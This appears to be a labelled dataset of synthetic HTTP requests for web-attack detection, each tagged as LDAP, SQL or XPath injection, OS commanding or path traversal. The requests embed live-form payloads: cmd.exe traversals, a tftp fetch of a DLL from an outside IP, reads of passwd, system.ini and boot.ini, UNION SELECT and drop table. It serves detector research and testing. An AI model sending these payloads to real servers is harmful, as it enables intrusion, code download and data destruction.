GET /w8G3pconnectOY.htm?r64Deiamsn=ppmcwG&qhmozw9e=668214585&nayty=e+poow9&sSeanat=aJqrZa7-Dfd&oexleht=tIti&FscriptIhttpsAOq6f=%29+%28++++%7C+++%28+++cn%3D*o+%27brien*+%29%28mail++++%3D*o++%27brien*%29+ HTTP/1.0
Host: www.NZed.biz
Connection: keep-alive
Accept: image/*;q=0.4, image/*;q=0.8, audio/*;q=0.7
Accept-Charset: utf-7, x-mac-ce, hz-gb-2312
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-age=73985
Client-ip: 138.65.107.125
Cookie: 2r5hTtnr=0905761;droptju=t7b_cO
Cookie2: $Version="98"
Date: Mon, 21 Jul 08 12:55:46 UTC
ETag: W/"MbuVquCmfY6sMkc"
Expect: fiS4=nShE;sqrii=ejdS6owa
From: Dddcd@u4uew8d4.be
If-Modified-Since: Tue, 17 Apr 07 10:29:06 UTC
If-Unmodified-Since: Sun, 01 May 05 18:54:01 CET
If-Match: *
If-None-Match: "6jZzROGsR6jl2Ew7g2"
If-Range: "F6F2@Ax-gf0gLSSeV"
Max-Forwards: 1
MIME-Version: 5.3
Pragma: t='b'
Proxy-Authorization: Basic eVRzbllhY2U6aXN0bw==
Authorization: Basic U2FsQWFoZDppN2VRdjlubg==
Range: 6-630560,55-36780
Referer: http://www.an5dtl.ch/8ycro/etiob/dYnu.swf
TE: gzip;q=0.7,trailers,gzip
Trailer: If-Range
User-Agent: dnollhju/4.5
UA-CPU: MIPS
UA-Disp: 495,5054,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 479x813
Via: HTTP/8.8 www.s37hLf.shtml, 6.1 www.o3gya1.html:7
Transfer-Encoding: diAUz; vhlate=t5Eee
Upgrade: dEii/5.0, tdxit/7.6, ieed/6.6, lZat/6.5, ogl/2.1
Warning: 815 www.sni22ed.shtml "iihdw6iguibnuR" 
X-Forwarded-For: 205.210.81.15
X-Serial-Number: 91445747246733
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38745
Start - Id: 37254
class: LdapInjection
GET /zCGhttpQT/1iEdh7/ni87a_/xtermk9affC5xPF/tamicrt.tiff?aor9pa=a%3Dsa%26neDp&G_ZcKK7CFwi=Nus%29%28%26%28objectClass++%3D+knti*%29&seewssshel=464108&aeeituussa=r-gHmWP2&cm=d7xitn9lebefhhTc&iguan=57115&txteei=q%7EE HTTP/1.1
Host: 45.180.107.39
Connection: keep-alive
Accept: application/postscript;q=0.2, application/rtf;q=0.9, application/rtf;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: gzip;q=0.7, identity
Accept-Language: *
Cache-Control: min-fresh=04
Client-ip: 112.64.200.186
Cookie: r1=8139968;OXtQV_4CdP=85;fYxp_5NMP=[7a btijsnlArreplaceh]nesamf;Nl4tae=2;dp9latrin=input3z;Ims.aMGWYupdateB=zuyrosanp
Cookie2: $Version="2"
Date: Sun, 13 Apr 08 06:41:53 GMT
ETag: W/"bNc0uNmABEHOP3zCY98w"
Expect: 100-continue
From: tlclo@pOIec.be
If-Modified-Since: Thu, 05 Mar 09 24:37:21 UTC
If-Unmodified-Since: Mon, 14 Jan 08 19:47:27 UTC
If-Match: "@8DU.pcaXN-DKvX"
If-None-Match: *
If-Range: *
Max-Forwards: 0482
Pragma: Lstioa=go4tmmnc
Proxy-Authorization: Basic c2U1ZlE6Z3RhYWp0bXQ=
Authorization: Digest cnonce="scdsYitU"
Referer: http://iahs.net/eoite1ea.sh
TE: trailers,gzip;q=0.3,deflate
Trailer: Referer
User-Agent: Mozilla/1.3 (compatible; Konqueror/2.5; Solaris; 4mherc3nt; et0Ei)
UA-CPU: 68000
UA-Disp: 785,4501,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 1371x144
Via: iaod/1.9 www.albtAee.gif
Transfer-Encoding: compress
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37254
Start - Id: 38502
class: LdapInjection
GET /4tP@V.fi7Q4V4OX/qd7@hcrcpWEJ@O/2klrEW5nvFExji@/rfg8iXKCtXD186U@/sTQ-execdelete6ZaW1rnph-ql/NGncEmetaoGcmdJx/rQtCB5I@JhnWW7kpBYac.jpg?ftff=ohole%24eeEtv&ekaws9tni1aoi=%29++++%28++++%7C++%28ea%3Dossj*%29&nkughh=ivfo&1MJO.=alogms5ocioar&.OS5EhG=8251624&i2gHguLAaccess_logl=setyeelcm5hlthd&IftI=+ogtO&LL5Qesr=489527 HTTP/1.1
Host: www.mh8Uazgov.it
Connection: close
Accept: audio/*;q=0.0
Accept-Charset: euc-tw, cp-936, euc-tw, euc-kr;q=0.2, iso-8859-5;q=0.6
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 219.137.118.75
Cookie: yg8tT6h=65;_8RnH=eftas<cSopensehrsetc;3toh=rgEyx2;weerccTgsan568t=tstaee0ettt8iit;snH7h=@g|madmiouit8 shutdownr2;-q9B3=8P3y=a\vpositionagroup byohAr]all@5
Cookie2: $Version="33"
Date: Thu, 23 Oct 08 03:40:33 GMT
ETag: "zquZ.85zU@b08iEVA7ZH"
Expect: 100-continue
From: eorT@elrAedmeoy.biz
If-Modified-Since: Mon, 17 Dec 07 05:10:16 UTC
If-Unmodified-Since: Tue, 31 Jul 07 16:58:38 CET
If-Match: *
If-None-Match: "NFfENmEb00JDlZZI-cj"
If-Range: Fri, 13 Aug 04 02:50:40 UTC
Max-Forwards: 811
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Basic ZWxlZmczcjU6Y3NhemQzaXU=
Authorization: ee2k3 stls=bcoains
Range: -087,245-62681,-648438
Referer: /7mskco9/snxtvop.nsf
TE: deflate,trailers,trailers
Trailer: If-None-Match
User-Agent: iwenti/4.1.1.7
UA-CPU: 68000
UA-Disp: 299,3970,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9397x4761
Via: 1.0 www.5enoeeb.html:767, HTTP/9.3 www.tnusg.gif, FTP/4.3 110.99.5.122
Transfer-Encoding: ol5je; uoops=akmmec
Upgrade: na0eT/4.7, vutbvf/7.1
Warning: 217 201.65.24.14 "trTmQnnra" "Fri, 16 Apr 04 06:13:32 CET"
X-Forwarded-For: 226.59.112.50
X-Serial-Number: 66891
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38502
Start - Id: 37417
class: LdapInjection
GET /za67xA1aeyeahhmsntsh/H9@U/nsdbx/9s5enEoN1R2xgbqFGY/rGK@QVbG8o.Qt5/p4jLxbHqS/asyxKPA89rz@pm/dDrC_QnddH9.js?wUapphinf=9tljhSdnscoatjr4k&t4e=aieboitevolt5sts&uaTajl6dsntpq=si+s+%3CRO&8obidonqvw=srs1RtrervAcc%3Ee&Iifjna=4736431 HTTP/1.0
Host: www.inesa4.gov
Connection: close
Accept: image/png
Accept-Charset: iso-8859-2, koi8;q=0.0, euc-tw;q=0.4
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-transform
Client-ip: 139.201.119.235
Cookie: v6=7;TrjHsy3jY5s=mcO)(|   (C2dsv=*);hgyFlsStscny=O7;grleoele
Cookie2: $Version="22"
Date: Fri, 28 Apr 06 15:19:06 GMT
ETag: "qX-6@1fltIYcTubLeUnR"
Expect: 100-continue
From: alaHcor@ktljooA.cz
If-Modified-Since: Sun, 26 Oct 08 16:50:31 CET
If-Unmodified-Since: Sun, 29 Apr 07 16:28:45 UTC
If-Match: *
If-None-Match: "rGd@YF.jloXhWmVBt"
If-Range: *
Max-Forwards: 2
MIME-Version: 1.4
Pragma: tpstoc='n'
Proxy-Authorization: Digest cnonce="EOlts"
Authorization: tlai 4vtr=eTit9E
Range: 747728-0693
Referer: http://aIEb.biz/rao18.pl
TE: gzip,trailers,trailers
Trailer: TE
User-Agent: Mozilla/4.6 (X11; U; Linux i386 0.1; gw-l9; rv:3.7.9) Gecko/46769242
UA-CPU: Sparc
UA-Disp: 8897,3460,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 359x5733
Via: faMi/6.3 www.eYdbddA.css
Transfer-Encoding: deflate
Upgrade: inCnt/4.0, wfn/1.0
Warning: 765 162.186.194.255:60063 "9jas9wzbnauexd" "Sun, 12 Oct 08 22:18:16 GMT"
X-Forwarded-For: 63.251.171.158
X-Serial-Number: 212738201929223
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37417
Start - Id: 44049
class: OsCommanding
GET .%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 124.110.92.136:80
Connection: adfaat58
Accept: text/html
Accept-Charset: windows-1258;q=0.3, iso-8859-7;q=0.7, windows-1258;q=0.3, cp-936
Accept-Encoding: compress, compress;q=0.9, gzip;q=0.9
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 11.19.174.55
Cookie: gweadrIstev=omtarinf ce;a7=sdnj;ahtwmhboaoo=oMJK.
Cookie2: $Version="20"
Date: Mon, 11 Oct 04 19:50:37 GMT
ETag: W/"Li@1xMYgprnknCP5zgmr"
Expect: 100-continue
From: 2eEemxwf@fedDctiae.gov
If-Modified-Since: Mon, 04 May 09 01:01:00 CET
If-Unmodified-Since: Thu, 04 Aug 05 06:56:41 UTC
If-Match: *
If-None-Match: "Jwfipt6vbwVNrLZsAE@4"
If-Range: *
Max-Forwards: 500
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Digest response="fEbfBB7c0E29b479e09d8FeF2679E7e3"
Authorization: Basic ZW5hc2k6anJuYW9ueWE=
Range: -0
Referer: /eauaut/eHmo/sotosn.php3
TE: trailers,chunked
Trailer: Authorization
User-Agent: Mozilla/7.2 (Machintosh; U; PPC Mac OS X 8.5; dA-do; rv:3.1.6) Gecko/14865478
UA-CPU: PowerPC
UA-Disp: 6819,8710,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 695x429
Via: deaoxc/4.0 29.20.165.153:913
Transfer-Encoding: gzip
Upgrade: tpnTf/6.7, GatRth/6.1, eyss8u/8.0
Warning: 003 www.easrIe.js "dEiywrccwaehsomosn" "Sun, 28 Mar 04 08:37:49 UTC"
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44049
Start - Id: 43670
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .exe? HTTP/1.0
Host: www.row5g88o.biz
Connection: close
Accept: */*;q=0.2
Accept-Charset: koi8, iso-8859-3;q=0.5, windows-1257;q=0.7, x-mac-chinesetrad, x-mac-ce
Accept-Encoding: gzip;q=0.3, gzip;q=0.0
Accept-Language: *
Cache-Control: min-fresh=53
Client-ip: 158.250.190.86
Cookie: tSzf=tqbtelnetrmh-~symain
Cookie2: $Version="617"
Date: Sat, 29 Nov 08 23:53:20 CET
ETag: "y-vPzRAwL-5olCNDYBs"
Expect: 100-continue
From: r63aj@miwmhwde.ch
If-Modified-Since: Tue, 04 Jul 06 22:16:58 UTC
If-Unmodified-Since: Mon, 14 May 07 06:24:17 GMT
If-Match: "4RwpNY5ja7vm3k-"
If-None-Match: *
If-Range: Sun, 31 Jul 05 13:20:23 GMT
Max-Forwards: 3194
MIME-Version: 2.2
Pragma: mot9d='etne8irh'
Authorization: Basic bWllc3I6aHVzNmVubzc=
Referer: /OynIe/cneq/Airyalei/iaafogs/sdwNp.htm
TE: chunked;q=0.2,deflate
User-Agent: aesm3jw42o (d2Wp@53; accUE5XKP; tGhVmh; a-ziE5HL; abFWfdEgb0)
UA-CPU: Sparc
UA-Pixels: 697x5821
Via: 5.6 40.21.55.90:554
Transfer-Encoding: compress
Upgrade: akEzd/2.3, jeaovc/8.8, iti/8.8, Yya3/8.2, lrscJp/3.7
Warning: 309 41.169.220.190 "skootttttuEirTl" 
X-Forwarded-For: 129.156.147.149
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43670
Start - Id: 46412
class: PathTransversal
GET /TSRrmvp/bAn9uephaahhhLn/dt/ogacwhaOetr5o.css?GXiM=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd&PwadminMrg=k%26Rh&qrrHn=ecsehop HTTP/1.0
Host: www.akior.biz
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-2, us-ascii, x-mac-greek, iso-8859-6
Accept-Encoding: *;q=0.3
Accept-Language: wle-Psde;q=0.9, erIMe-3oiwiaT0;q=0.4, ora-n;q=0.0
Date: Tue, 17 Apr 07 24:02:52 UTC
MIME-Version: 6.7
Referer: http://o45n.de/tcivrcem/esf50/u0an5/b8her.avi
TE: chunked;q=0.1,trailers,trailers
User-Agent: adbalSDg http://www.iuupg.de
Transfer-Encoding: compress

null

End - Id: 46412
Start - Id: 45202
class: PathTransversal
GET ////? HTTP/1.1
Host: 174.74.124.5:9120
Connection: keep-alive
Accept: image/*;q=0.8, application/x-tar, application/postscript
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.0
Cache-Control: max-age=52877
Client-ip: 125.250.245.160
Cookie: 90Ie=247467;rot8e=468;_jOfPQoptwV=18516;lHl1Ar7h=8602;4Sqonln=33615
Cookie2: $Version="5"
Date: Wed, 27 Feb 08 09:21:55 UTC
ETag: W/"LyCJ_rPrQiUKw7_E"
Expect: oq0ewer7
From: 6gdote@rgqihciehi.be
If-Modified-Since: Tue, 26 Oct 04 16:15:31 CET
If-Unmodified-Since: Sun, 22 Aug 04 24:26:00 CET
If-Match: *
If-None-Match: "SNI-U1r5I.tNzdBLFWk"
If-Range: Sun, 15 Feb 09 18:41:00 CET
Max-Forwards: 185
MIME-Version: 1.6
Pragma: xi8l='toq'
Proxy-Authorization: nb6je iukaapia=w5hm8
Authorization: NTLM b3VlYW9ZbDN0QWFvdGNpN2RudGVzbm5laVdudWxFamVjb1JoeGVs
Range: 706278-,584316-,-67
Referer: http://mmiqaam.fr/eso0dozl.msf
TE: gzip;q=0.1,chunked
Trailer: User-Agent
User-Agent: Mozilla/1.8 (Machintosh; U; PPC 2.9; tH-lu; rv:7.0.4) Gecko/90626258
UA-CPU: StrongARM
UA-Disp: 749,556,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 2083x0053
Via: 2.3 224.133.118.188
Transfer-Encoding: deflate
Upgrade: eimdea/6.6
Warning: 342 www.bgya.css "oc3o7d" 
X-Forwarded-For: 12.15.76.12
----: -------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45202
Start - Id: 45788
class: PathTransversal
GET /otdGRopNk.ShAp/eTne8e.css?Il=o-uZQ6WaAue&ssa7ac5AOin=8&ealyrssubEhcC=a%40nW%3C&7Z4ei=7455733&xhrthmgnm0irts=r&art6auccsdotyw=arOEfru4hxh4e&sonepfnB=gHHGjZeR&gr=hstnQ&dafin2s2aaIiu=formfl6dm2st&ia4dv2es7w5asf=lfP6t6%402o&ra=auari&araeoD=%3Bnfsoo&irw0ahh6ei45j=..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&at9rsiaetu0IP=71 HTTP/1.1
Host: www.ssre.de
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-7, iso-8859-9, ks_c_5601-1987;q=0.5, windows-1258, x-mac-korean
Accept-Encoding: 
Accept-Language: hee-6tunZ;q=0.6, e-eNywt, te6oee-ssbn2qas;q=0.6
Cache-Control: max-stale
Client-ip: 40.147.120.92
Cookie: 66tyb=639;0AiframedeIh8usrZ9=6;p9aef0odseanh6o=erU
Cookie2: $Version="26"
Date: Tue, 06 Nov 07 15:49:40 GMT
ETag: "1UYXYoyn1ISOZ-ytTEbk"
Expect: 100-continue
From: rsj6lTrn@Ezll0rry.ch
If-Modified-Since: Fri, 15 Aug 08 10:56:09 UTC
If-Unmodified-Since: Sat, 20 Aug 05 17:53:16 UTC
If-Match: *
If-None-Match: "tm2vALpcmhbfa@eOmu"
If-Range: *
Max-Forwards: 97
MIME-Version: 2.9
Pragma: Bihebek=odi0ia
Proxy-Authorization: attk esmu5=OSiF3tt
Authorization: Basic b3RtbE9vdzp0aWh0YQ==
Range: 855-
Referer: /aatoA7ut/idao3i/nElron/7mdr/i8iboih.wav
TE: trailers,chunked
Trailer: Accept-Language
User-Agent: iTotoesbnyxwpwrn7
UA-CPU: PowerPC
UA-Disp: 4288,202,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 9422x259
Via: 5.0 www.anoIep.jpeg
Transfer-Encoding: gzip
Upgrade: F3awa4/4.3, 9rim7/0.4, reilie/2.8, 3il/4.5, Stse/6.1
Warning: 610 192.1.135.3:2396 "ysstaeiltotrenks" "Sun, 26 Mar 06 18:59:14 UTC"
X-Forwarded-For: 0.142.120.56
X-Serial-Number: 06918680418533
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45788
Start - Id: 45608
class: PathTransversal
GET /dyTrforE/s68KRntbhy6/styleMM9XxSK1uaZs/rsoGHykbtlRh08QJt4r/tnte7dY84ee3asio/leybEnoetamalnah/u6/leMnxd2nPp0ora/FP9evalw.874VqbGEU/ilnioNOrlcsiizda6yf/rF.html?acisrinewttl2s=nnrrEtryoao8laRes&_ew0idT@G3Y=38t0ztndcddThzfid&kwblfkttwest8n=%3Brda&lnk5fennohtitc=9nwl0aYo8oeseMeg5h&7ccnaE=5506&agteraoee=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&D2i1_imgM7xFFY=9&eaIej=o%29&eyr=89&@rOhYLza9nkecho=lu8+&easlltesonair8s=3n9arttdinputity&tr7n=gr8 HTTP/1.1
Host: 198.94.89.10:38
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: *;q=0.7
Accept-Encoding: gzip;q=0.3, identity, compress, identity;q=0.0, compress
Accept-Language: gzeydrIe-ee
Cache-Control: no-store
Client-ip: 145.209.224.15
Cookie: Hnteosrr15tit=eUeGe-;E4JM3ZchildXOX=Brz1ei47m7;1DhPm9c.fl=oMW;en1=aornda0sni;eshtTv=lh1
Cookie2: $Version="71"
Date: Thu, 13 Jan 05 03:20:39 GMT
ETag: W/"hYq.Qe6vS5JVPkNg"
Expect: esyo=tri8;dewo=I4XpUye
From: f4re3ea2@HiNl.uk
If-Modified-Since: Wed, 21 Jan 04 24:56:21 GMT
If-Unmodified-Since: Wed, 01 Mar 06 19:29:14 CET
If-Match: *
If-None-Match: "2mV2QwsXwi2Wo9KAEEK"
If-Range: Wed, 07 Mar 07 21:48:36 UTC
Max-Forwards: 07
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: ench vu6n=5eeTe
Authorization: NTLM ZG5mQmVwaGFqdHN3M2g3d1JwdGQzMGkzaG1FSWNubU5vdWlzZXRpY2VhdHVz
Range: 942-,71595-5
Referer: http://ntnB.be/rDineveh/dgeeco/aanso84y/1nija.pl
TE: deflate;q=0.5,trailers,chunked
Trailer: Via
User-Agent: Mozilla/8.4 (X11; U; Open BSD i586 0.0; j9-nL; rv:4.2.8) Gecko/28842008
UA-CPU: x86
UA-Disp: 6050,986,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0039x975
Via: eat5l/9.9 76.214.212.118
Transfer-Encoding: uRazet; srieue=hqohnosi
Upgrade: lsf/8.1, rxeP4b/0.5, dc3n5/4.8
Warning: 463 21.80.148.220 "rrehjvicmc0ctipxgiaz" "Tue, 25 May 04 08:29:25 CET"
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 749320741
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45608
Start - Id: 41619
class: SqlInjection
GET /AItm67/sBiL/OinputJn./KlLrD6@0Im3node/soeGpetwemohq/lifi/pheb2oeeelcg/dX9UtCKIFu06TpC-.VL/cbt2LFHVRwI6eR/s_KL-yAB3VuB1/qXcatXtD.2betweenK7homemS/ilets.cgi?jului=moe4kadbihEnrehavm&TOhtkvQ=z1oRileeLlyll&6iit=4142448&eka=%26nrtl%3F%7Crrilcl&en=%27UNIONALLSELECTfieldFROManilWHERE%27%27+++%3D++++%27&omlanaoob5dotas=6&nsnransetn=ok65o&9no9adEleasxcts=743&lNicbMogoe=sdtqo56aalostReo HTTP/1.1
Host: 203.238.3.92:610
Connection: enedhx
Accept: application/rtf;q=0.3, application/zip, video/mpeg;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: s-a8k;q=0.9, nnodo-e;q=0.8
Cache-Control: max-stale=1869
Client-ip: 224.247.255.87
Cookie: malee=fprl;fHaMopmhSe= iascate tbetweenti;e+;yeosh=471;iosasEyRawtte=Rgroup by;7centmlpintaNS=ySc(l
Cookie2: $Version="003"
Date: Tue, 15 Aug 06 06:48:39 CET
ETag: "vz5WQdacqFuv82n8"
Expect: lrfohe
From: tcssd@oays6you.com
If-Modified-Since: Mon, 17 Aug 09 22:58:18 CET
If-Unmodified-Since: Fri, 22 Oct 04 16:07:36 UTC
If-Match: *
If-None-Match: "uD5.dA5.g8fBDDRS"
If-Range: Tue, 25 Apr 06 05:14:02 GMT
Max-Forwards: 15
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: akeo5s nryIh=hnabaoI
Authorization: ephb c0so=ueyyJta
Range: 537-
Referer: /isnetn/ecaonrr/9phe/cyeulr.php3
TE: trailers,chunked;q=0.5
Trailer: Via
User-Agent: wrtheecul (dWKXi8um3V; hTkEBRwj.; s8l7sJ)
UA-CPU: MIPS
UA-Disp: 5571,966,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 0620x1367
Via: HTTP/7.8 www.eiuCro.css, HTTP/8.5 www.2iertm.jpeg, 6.4 158.50.218.211
Transfer-Encoding: compress
Upgrade: bxnsG/8.0, e7cm/6.6
Warning: 971 www.l4ihl.css "jglskraM3styhIle" "Mon, 26 Jan 09 22:24:50 GMT"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41619
Start - Id: 44531
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
Host: www.ueiwrmlaIe.de:80
Connection: close
Accept: image/gif;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Cookie: atswae=enhisto'Tnth;ISlhjhpyrale8=jewSsobject8~e9
Cookie2: $Version="79"
Date: Wed, 16 Apr 08 22:31:56 UTC
ETag: W/"pik_981fbQAX0z-QQeD"
Expect: swso=vdlpOs
If-Modified-Since: Tue, 27 Sep 05 04:23:33 CET
If-Match: *
If-None-Match: "ZBaC@EA2nBCb@.gpc5s_"
If-Range: *
Max-Forwards: 977
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest response="208F600d95D2dDe4DB8BB5BaA6EEC86a"
Range: 30684-
Referer: http://www.muanmEh.net/otholnaR.txt
TE: trailers
Trailer: TE
User-Agent: Mozilla/2.2 (Machintosh; U; PPC 9.8; r0-nu; rv:7.9.6) Gecko/48076220
UA-CPU: 68000
UA-Disp: 692,7147,32
Via: HTTP/2.2 237.75.203.183:0631, s4S/5.6 238.19.141.61
Transfer-Encoding: identity

null

End - Id: 44531
Start - Id: 42774
class: SqlInjection
POST /ohnzyanej/YsiVKrKKZXgI/rtho3ghttrwui/t2p6lIi/9w9hC3UJservicesbj9CvP.asmx? HTTP/1.1
Content-Length: 37
Content-Language: Rieptssc,hrTebq,pr
Content-Encoding: gzip
Content-Location: http://www.ss1se2ls.org/enshs/hsdk/v4za8.mp3
Content-MD5: ajNmcjB0YXNtZTZzNGJqZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 04 Jan 09 09:21:12 CET
Last-Modified: Sat, 26 Jan 08 24:56:23 GMT
Host: 240.252.30.18
Connection: oor6e
Accept: image/*;q=0.2
Accept-Charset: euc-tw, euc-cn;q=0.6, iso-8859-5
Accept-Encoding: compress;q=0.3, deflate, compress, identity, gzip;q=0.5
Accept-Language: Et-oga8sade;q=0.4, 8-rzudfzow;q=0.7, hderdsr5-reh4E;q=0.5, riTyehtw-yroMnea;q=0.1, 7uegy-ua;q=0.7
Cache-Control: no-store
Client-ip: 48.186.187.130
Cookie: hutER8TslenAsr=';    drop table  yiide;HGVZYJ.X@=1/systemnerslog4o%ai
Cookie2: $Version="74"
Date: Tue, 11 Jul 06 04:43:10 UTC
ETag: "WF4A4@FXbzWEO3h-"
Expect: le7n
If-Modified-Since: Wed, 06 Jan 10 02:51:58 GMT
If-Unmodified-Since: Sun, 25 Dec 05 24:56:10 GMT
If-Match: "Ez5MRAUvZtamGkk"
If-None-Match: *
If-Range: Fri, 12 Jun 09 01:03:40 CET
Max-Forwards: 804
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: 1oi2hy rTepl=hneaC
Authorization: Basic a3RzbTpzN2V5bQ==
Range: 169067-0
Referer: /smtiaeh2/nnlsl/rones/7ekaet6d/itrwtfY.mspx
TE: trailers
Trailer: Authorization
User-Agent: etrm9rnesd (6vTlFDQ; erWbl9; aorjtApTT)
UA-CPU: PowerPC
UA-OS: FreeBSD
Via: FTP/7.0 www.bt9hat.js, HTTP/6.6 212.228.156.112:449
Transfer-Encoding: gzip
Upgrade: avqW/1.7, 8id3nt/8.2, ybt/0.5, a8nes/6.6
Warning: 901 www.ooto5.jpg "hxEMfthhileDx" 
X-Serial-Number: 58260161
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

89nullw=33963000&2uAe=fdsljlinp6tIcCl

End - Id: 42774
Start - Id: 50027
class: XPathInjection
POST /edeoa/oqLVSQnhdMKcK.dll? HTTP/1.0
Content-Length: 53
Content-Language: oea,5ooce
Content-Encoding: deflate
Content-Location: http://prtjpx.be/vepwte/olteoq0/rih95hng/truIawt.msf
Content-MD5: cXRuaGxubk4zcG9lc3QwaA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 12 Mar 09 05:28:50 CET
Last-Modified: Tue, 30 Dec 08 06:40:51 CET
Host: 103.26.254.252:80
Connection: keep-alive
Accept: application/zip;q=0.0, text/*;q=0.4
Accept-Charset: *
Accept-Encoding: itTooeu' or   count(  path/child::node()[position()=(( i+   j +    k  +   l+ 1)] |    path/child::*()[position()=(k+1)])=1    or   'tpbtdd'=   ' ee'   or
Accept-Language: e-oitMpemd, 0temsl-5CEsor, 4ie-nI, dttndasg-CH, 719-tteioEm;q=0.4
Cache-Control: min-fresh=98
Cookie: erohwhhxaO9yrx=7933
Cookie2: $Version="41"
Date: Thu, 30 Jun 05 21:06:04 CET
Expect: 3edmta6m
From: nedh@e0uheaoepd.com
If-Modified-Since: Fri, 11 Jan 08 01:04:23 UTC
If-Unmodified-Since: Tue, 29 Jun 04 13:05:44 CET
If-None-Match: *
If-Range: Thu, 11 Sep 08 10:43:27 CET
Max-Forwards: 7
Proxy-Authorization: Basic bm9ldzhpdTpuaHRubw==
Authorization: Digest username="1oupNa6o"
Range: 8-710
Referer: /qiyza/1tftoks.swf
TE: trailers
User-Agent: Mozilla/0.2 (Machintosh; U; PPC Mac OS X 4.7; o0-2e; rv:1.9.5) Gecko/70793069
UA-CPU: StrongARM
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 412x6538
Via: FTP/2.1 www.urtrtS.png, 3.4 185.51.60.13:2, 3.9 www.hamtonze.gif
Transfer-Encoding: deflate
Upgrade: odsrn/7.3, noifE/8.7
Warning: 364 www.snye8.shtml "eosaaz" 
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

AicvftqeneO=tsam-u&boot.ini3xboot.iniWyl=rtNrercjdiet

End - Id: 50027
Start - Id: 38451
class: LdapInjection
GET /enO/k6PG/eSOx7yPU_dZJHzW60l/hihfwtcmserpp/tato/lke/ea/su/ecEmtbptumobghyu.js?d1_system--etcdeleteubgsound@=525&e2aE0dde=m41vHhz&uoeqszfrset=3773768&Ftt=8&0P-uJy2A=+eTlboot.iniMot1+ml%24%3An&EanTRs=%29+++%28%7C++++%28displayName%3Dhad*%29%28name++++%3D++had*+%29%28mail%3Dhad*+++%29&inzniSxaaiotrs=ovprocessing-instructionzi+bia%26e&d7CRrhchn=hvS&eilHnhOlu=sftl4U2oy4set HTTP/1.1
Host: www.tfestt.de:3199
Connection: keep-alive
Accept: */*
Accept-Charset: shift_jis;q=0.9, euc-kr, windows-874
Accept-Encoding: 
Accept-Language: eFxlgtad-Lhn;q=0.0, laataip-TpVIt;q=0.0, ddTg-hseaona;q=0.3, y-rotk;q=0.5, tonis-shr
Cache-Control: only-if-cached
Client-ip: 131.162.142.41
Cookie: dw0=9282
Cookie2: $Version="35"
Date: Sun, 10 Sep 06 14:30:33 GMT
ETag: W/"DYNYlE_..-0XtO8cK"
Expect: 100-continue
From: ehrneaE@tHrzlsadoS.fr
If-Modified-Since: Tue, 14 Jul 09 01:11:48 GMT
If-Unmodified-Since: Tue, 23 Sep 08 19:26:45 GMT
If-Match: *
If-None-Match: "cRnoxUnj0znYiVH8"
If-Range: Tue, 26 Jan 10 11:04:23 UTC
Max-Forwards: 735
MIME-Version: 3.3
Pragma: 9='tGl3bE'
